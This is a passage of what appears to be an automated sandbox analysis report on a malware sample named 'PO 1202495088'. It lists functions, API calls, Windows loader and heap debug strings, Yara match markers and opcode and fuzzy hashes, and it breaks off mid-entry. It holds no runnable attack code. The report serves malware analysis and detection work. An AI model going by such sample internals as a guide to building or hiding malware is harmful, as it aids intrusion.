                                                                                          • Opcode Fuzzy Hash: fa5829be2d6eb154383cb23535c4947cf9fe600585339082a8d573289889c6d0
                                                                                          • Instruction Fuzzy Hash: 8C90023260180502D50171595A1470B000597D0302F51C426A115455ADC73589517571
                                                                                          Function 013F34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: e0f8da02629b756e91432613a46f332db5b33095a38957aad2eca424d8a2aff7
                                                                                          • Instruction ID: 66182276ece284f335c14317f4506d6abd75ef10fd25dd504c7a130db7592aeb
                                                                                          • Opcode Fuzzy Hash: e0f8da02629b756e91432613a46f332db5b33095a38957aad2eca424d8a2aff7
                                                                                          • Instruction Fuzzy Hash: 1C900232A0550502D50171595714706100597D0301F61C826A041456DDC7B58A5175A2
                                                                                          Function 004146F5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(--cG1-69-,00000111,00000000,00000000), ref: 00414780
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_400000_PO 1202495088.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: --cG1-69-$--cG1-69-
                                                                                          • API String ID: 1836367815-2696456154
                                                                                          • Opcode ID: c5b72e2f3fff9381100f87141ff93d0d4388590487560ee45dcfae67c73c8d0c
                                                                                          • Instruction ID: 9cf80268f77044ef790c1c2abc85dc15f1fb4f0f00327b47cd463f739ad630b0
                                                                                          • Opcode Fuzzy Hash: c5b72e2f3fff9381100f87141ff93d0d4388590487560ee45dcfae67c73c8d0c
                                                                                          • Instruction Fuzzy Hash: C711C6B1E4431876EB11AB91DC02FDF7B789F41714F018059FE147B281D3B89A0687E9
                                                                                          Function 00414703 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 38 414703-414713 39 41471c-414771 call 42f803 call 417eb3 call 404ab3 call 4254d3 38->39 40 414717 call 42edf3 38->40 50 414793-414798 39->50 51 414773-414784 PostThreadMessageW 39->51 40->39 51->50 52 414786-414790 51->52 52->50
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(--cG1-69-,00000111,00000000,00000000), ref: 00414780
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_400000_PO 1202495088.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: --cG1-69-$--cG1-69-
                                                                                          • API String ID: 1836367815-2696456154
                                                                                          • Opcode ID: 2404142d2139fe2dc2d2998e8221aae8cf0b0789d09e28991ccc1465ef9f64a5
                                                                                          • Instruction ID: d188dead4f36383fb44ff5ed79d53b29f72580d310d15dc5f7dee60383c7666d
                                                                                          • Opcode Fuzzy Hash: 2404142d2139fe2dc2d2998e8221aae8cf0b0789d09e28991ccc1465ef9f64a5
                                                                                          • Instruction Fuzzy Hash: E001C871E4021876DB11A7919C02FDF7B7C9F41714F008059FF147B2C1D6B85A0687A9
                                                                                          Function 004146B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52threadwindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 53 4146b8-4146bc 54 41472e-414771 call 417eb3 call 404ab3 call 4254d3 53->54 55 4146be-4146d4 53->55 62 414793-414798 54->62 63 414773-414784 PostThreadMessageW 54->63 55->54 63->62 64 414786-414790 63->64 64->62
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(--cG1-69-,00000111,00000000,00000000), ref: 00414780
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_400000_PO 1202495088.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: --cG1-69-$--cG1-69-
                                                                                          • API String ID: 1836367815-2696456154
                                                                                          • Opcode ID: 0e1a7b9e5055d6e9a235eee43e9c21683ed9dd1a924f13b984badc4505965b4e
                                                                                          • Instruction ID: a2084ebda050bdff8e3395dbdaee04fa0238bf01014c37db4853ee82cf069130
                                                                                          • Opcode Fuzzy Hash: 0e1a7b9e5055d6e9a235eee43e9c21683ed9dd1a924f13b984badc4505965b4e
                                                                                          • Instruction Fuzzy Hash: 6D014CB1D4530475E72197A0AC02FEF7B689F82724F00419AFE20BB2C5C6785A4187AD
                                                                                          Function 0042D023 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 313 42d023-42d067 call 404b43 call 42ded3 RtlFreeHeap
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,4E8B0446,00000007,00000000,00000004,00000000,00417735,000000F4), ref: 0042D062
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_400000_PO 1202495088.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: e3bcd0732160e3b6f71be127c7a65e4ca80d18ba13c7f5289b9116d8d7022430
                                                                                          • Instruction ID: b1f67ff1680508f6b48a13b8e8d45400879f8c202f5ac700e6df5a6440d7a715
                                                                                          • Opcode Fuzzy Hash: e3bcd0732160e3b6f71be127c7a65e4ca80d18ba13c7f5289b9116d8d7022430
                                                                                          • Instruction Fuzzy Hash: B9E06D72604204BBD610EE59EC41F9B77ACDFC5714F004419FA08AB242D770B91086B8
                                                                                          Function 0042CFD3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 308 42cfd3-42d014 call 404b43 call 42ded3 RtlAllocateHeap
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,0041EC5B,?,?,00000000,?,0041EC5B,?,?,?), ref: 0042D00F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_400000_PO 1202495088.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 73b2d8e897333f4cbf0dabf0c85a12c2b34041909e0ddd2ad4c4f879b0146da9
                                                                                          • Instruction ID: 7b03c5464cd71f7b56b57a232ca469f330cc0886600393034a38dfef118b4b2f
                                                                                          • Opcode Fuzzy Hash: 73b2d8e897333f4cbf0dabf0c85a12c2b34041909e0ddd2ad4c4f879b0146da9
                                                                                          • Instruction Fuzzy Hash: 9AE09AB6700208BBD610EE59EC41F9B77ACEFC9710F004419FE09AB242D670B9108BB8
                                                                                          Function 0042D073 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 323 42d073-42d0af call 404b43 call 42ded3 ExitProcess
                                                                                          APIs
                                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,220AB2FE,?,?,220AB2FE), ref: 0042D0AA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_400000_PO 1202495088.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExitProcess
                                                                                          • String ID:
                                                                                          • API String ID: 621844428-0
                                                                                          • Opcode ID: 815f97d0ad3e5c06b9465586eede46200b738d80c520c3a1271a43bb1a3d3db6
                                                                                          • Instruction ID: 46dd625dd64cb4bfb7d8af5c768814de95ff13fe0ff90786c18fe221300a3b06
                                                                                          • Opcode Fuzzy Hash: 815f97d0ad3e5c06b9465586eede46200b738d80c520c3a1271a43bb1a3d3db6
                                                                                          • Instruction Fuzzy Hash: 07E04F322002147BD510AA5ADC41FDBB7ACDBC5710F014419FA08A7182DAB0BA0187E4
                                                                                          Function 013F2B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 328 13f2b2a-13f2b2f 329 13f2b3f-13f2b46 LdrInitializeThunk 328->329 330 13f2b31-13f2b38 328->330
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 672cedc67f0d071037fd6b1ee7525145ca279053a8bd5ae9c39ae01d61c733f7
                                                                                          • Instruction ID: 95e105f38638e113d56cfaa8a508ffcbcfcf718860631e084e6caf01819814ba
                                                                                          • Opcode Fuzzy Hash: 672cedc67f0d071037fd6b1ee7525145ca279053a8bd5ae9c39ae01d61c733f7
                                                                                          • Instruction Fuzzy Hash: BBB09B72D014C5C5DA12E7645708B177900B7D0705F15C476D2460645FC778C591F175

                                                                                          Non-executed Functions

                                                                                          Function 01468890 Relevance: 37.8, Strings: 30, Instructions: 268COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0146890C
                                                                                          • The critical section is owned by thread %p., xrefs: 014689E9
                                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01468953
                                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 01468982
                                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 01468ABF
                                                                                          • *** then kb to get the faulting stack, xrefs: 01468B4C
                                                                                          • *** Inpage error in %ws:%s, xrefs: 01468A48
                                                                                          • write to, xrefs: 01468AD6
                                                                                          • The resource is owned exclusively by thread %p, xrefs: 014689A4
                                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01468AB4
                                                                                          • The instruction at %p referenced memory at %p., xrefs: 01468A62
                                                                                          • This failed because of error %Ix., xrefs: 01468A76
                                                                                          • The instruction at %p tried to %s , xrefs: 01468AE6
                                                                                          • *** enter .exr %p for the exception record, xrefs: 01468B21
                                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01468923
                                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01468AAD
                                                                                          • *** enter .cxr %p for the context, xrefs: 01468B3D
                                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01468B6F
                                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01468944
                                                                                          • an invalid address, %p, xrefs: 01468AFF
                                                                                          • a NULL pointer, xrefs: 01468B10
                                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 014689CB
                                                                                          • <unknown>, xrefs: 014688AE, 01468901, 01468980, 014689C9, 01468A47, 01468ABE
                                                                                          • read from, xrefs: 01468ADD, 01468AE2
                                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 014689BF
                                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01468A06
                                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01468AA6
                                                                                          • The resource is owned shared by %d threads, xrefs: 014689AE
                                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01468935
                                                                                          • Go determine why that thread has not released the critical section., xrefs: 014689F5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                          • API String ID: 0-108210295
                                                                                          • Opcode ID: f0e2671a6c65aa91df6a30d0c4d344a649ecb258fb73ade5f41f5160c1ed9c0a
                                                                                          • Instruction ID: 62fde8ab66005a90673fe38526127065afb0a117324b7a093a2000fdffcb4bd2
                                                                                          • Opcode Fuzzy Hash: f0e2671a6c65aa91df6a30d0c4d344a649ecb258fb73ade5f41f5160c1ed9c0a
                                                                                          • Instruction Fuzzy Hash: 1681E675A41311BFDB259B0A9C45E6B3B29EFAAB1CF44044EF5042B336D3B69412C7A3
                                                                                          Function 013E8540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • corrupted critical section, xrefs: 014252CD
                                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 0142534E
                                                                                          • Critical section debug info address, xrefs: 0142522A, 01425339
                                                                                          • Invalid debug info address of this critical section, xrefs: 014252C1
                                                                                          • Critical section address., xrefs: 0142530D
                                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014252ED
                                                                                          • Critical section address, xrefs: 01425230, 014252C7, 0142533F
                                                                                          • Thread identifier, xrefs: 01425345
                                                                                          • 8, xrefs: 014250EE
                                                                                          • Address of the debug info found in the active list., xrefs: 014252B9, 01425305
                                                                                          • undeleted critical section in freed memory, xrefs: 01425236
                                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01425215, 014252A1, 01425324
                                                                                          • double initialized or corrupted critical section, xrefs: 01425313
                                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014252D9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                          • API String ID: 0-2368682639
                                                                                          • Opcode ID: c6ab67cd350f70190ff848cfcfedcaf521eb0dd7f0bbea7f361b2a59997dd978
                                                                                          • Instruction ID: 3b9bc405205efc086b11b43a3e551ebcd95713a00bc31db33a7cdddf2513792b
                                                                                          • Opcode Fuzzy Hash: c6ab67cd350f70190ff848cfcfedcaf521eb0dd7f0bbea7f361b2a59997dd978
                                                                                          • Instruction Fuzzy Hash: F3816D71A41358AFDF20CF99C885BEEBBB4FB49718F60419AF504BB290D774A941CB50
                                                                                          Function 013E2919 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • @, xrefs: 014223A5
                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01422310
                                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01422213
                                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014220EE
                                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 01422429
                                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 014222A2
                                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 0142240C
                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 0142242E
                                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 0142221C
                                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014222CA
                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014223F5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                          • API String ID: 0-4009184096
                                                                                          • Opcode ID: 4747178f86968acbd6d26e2aedf6d1e374006d7ff99edc3af3b4a6b557d4a9e2
                                                                                          • Instruction ID: bc82348a8294ec97ecb07c8723f960ee824597b04589ea092ade8b28e3e0049b
                                                                                          • Opcode Fuzzy Hash: 4747178f86968acbd6d26e2aedf6d1e374006d7ff99edc3af3b4a6b557d4a9e2
                                                                                          • Instruction Fuzzy Hash: 11025FB1D002399BDF21DF14CC84BEAB7B8AB55308F4041DAE609A7291DB719EC4CF59
                                                                                          Function 014586C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                          • API String ID: 0-2515994595
                                                                                          • Opcode ID: 079dcc3905d9c8bfcfdaa8077c9b813ef274aeda55aa10c21e8b605329056b86
                                                                                          • Instruction ID: 85404dca630f4673c84c766a8953306a7bdba6255c62f5d818c0841deb1c0e60
                                                                                          • Opcode Fuzzy Hash: 079dcc3905d9c8bfcfdaa8077c9b813ef274aeda55aa10c21e8b605329056b86
                                                                                          • Instruction Fuzzy Hash: 615104711043129BD325DF1A9C44BABBBE9FF84254F14491EFE59C3262EB30D509C792
                                                                                          Function 01460835 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                          • API String ID: 0-1357697941
                                                                                          • Opcode ID: 835309c34d018da8b4e867a87ef730933618e655f83b6831a00133daf32e0d32
                                                                                          • Instruction ID: 99d3fb5419abbb6d785e0d0e82ed94c396604504901276c66b7b26b80ba9a3ce
                                                                                          • Opcode Fuzzy Hash: 835309c34d018da8b4e867a87ef730933618e655f83b6831a00133daf32e0d32
                                                                                          • Instruction Fuzzy Hash: 23F1F131A00246EFDB25DF68C480BAABBF9FF1570CF48845AF5859B362D730A945CB52
                                                                                          Function 01448D0A Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                          • API String ID: 2994545307-3063724069
                                                                                          • Opcode ID: 4ae3a0369f5282def7769f25f80c761188a1715b80abc01f7fa75f274ab3e275
                                                                                          • Instruction ID: 791d363bfec1c682c5cdf9e50bbb348919e975ca3e820720c8651b93e015f757
                                                                                          • Opcode Fuzzy Hash: 4ae3a0369f5282def7769f25f80c761188a1715b80abc01f7fa75f274ab3e275
                                                                                          • Instruction Fuzzy Hash: 13D1D872804316AFF721DF58C844B6FBBE8AF98718F044A2EFA8497260D770DD459792
                                                                                          Function 01438633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • VerifierDlls, xrefs: 0143893D
                                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 014386BD
                                                                                          • VerifierDebug, xrefs: 01438925
                                                                                          • AVRF: -*- final list of providers -*- , xrefs: 0143880F
                                                                                          • VerifierFlags, xrefs: 014388D0
                                                                                          • HandleTraces, xrefs: 0143890F
                                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 014386E7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                          • API String ID: 0-3223716464
                                                                                          • Opcode ID: 9171eea5159b2b67a52a198cea4a968c571b50f07d447812c5269469fd0d274a
                                                                                          • Instruction ID: 519617bb246fa4a20fa3a4c4d4b5fa0b7aaed3f7d6ab07119121c2ad428f6547
                                                                                          • Opcode Fuzzy Hash: 9171eea5159b2b67a52a198cea4a968c571b50f07d447812c5269469fd0d274a
                                                                                          • Instruction Fuzzy Hash: 6B910672604313ABD722DF699980B6BFB95AF98718F46061EF6406F371C7709C05CB92
                                                                                          Function 01434A57 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • Execute '.cxr %p' to dump context, xrefs: 01434B31
                                                                                          • LdrpGenericExceptionFilter, xrefs: 01434A7C
                                                                                          • LdrpProtectedCopyMemory, xrefs: 01434A74
                                                                                          • ***Exception thrown within loader***, xrefs: 01434AA7
                                                                                          • minkernel\ntdll\ldrutil.c, xrefs: 01434A86
                                                                                          • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01434AB8
                                                                                          • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01434A75
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                          • API String ID: 0-2973941816
                                                                                          • Opcode ID: 4d9687b2825fbdcdd9c310a8f59149c87fc287cbadf76f88068866568b1906fd
                                                                                          • Instruction ID: 670f961149c08fc72d99410f0700d7bfab54507645d6df0baaac2ac53d47a608
                                                                                          • Opcode Fuzzy Hash: 4d9687b2825fbdcdd9c310a8f59149c87fc287cbadf76f88068866568b1906fd
                                                                                          • Instruction Fuzzy Hash: BC215BB61441067BEB28AABE8C45E777B68FBDD979F18050BF212A77B0C570DD02C214
                                                                                          Function 013BE9A0 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                          • API String ID: 0-1109411897
                                                                                          • Opcode ID: 07a0facafd403eaf86b90b6840fdb11968178ffd4e4fa8b54702e70cf0b94a90
                                                                                          • Instruction ID: 72052b227835f067b1c4029c3c4e24ad6023b486dfa4a9648a52c70aea2504ec
                                                                                          • Opcode Fuzzy Hash: 07a0facafd403eaf86b90b6840fdb11968178ffd4e4fa8b54702e70cf0b94a90
                                                                                          • Instruction Fuzzy Hash: 8BA23B74A0522A8FDB64DF18CC887E9B7B5AF44318F1442EAD90DA7764EB349E81CF00
                                                                                          Function 013BAD00 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
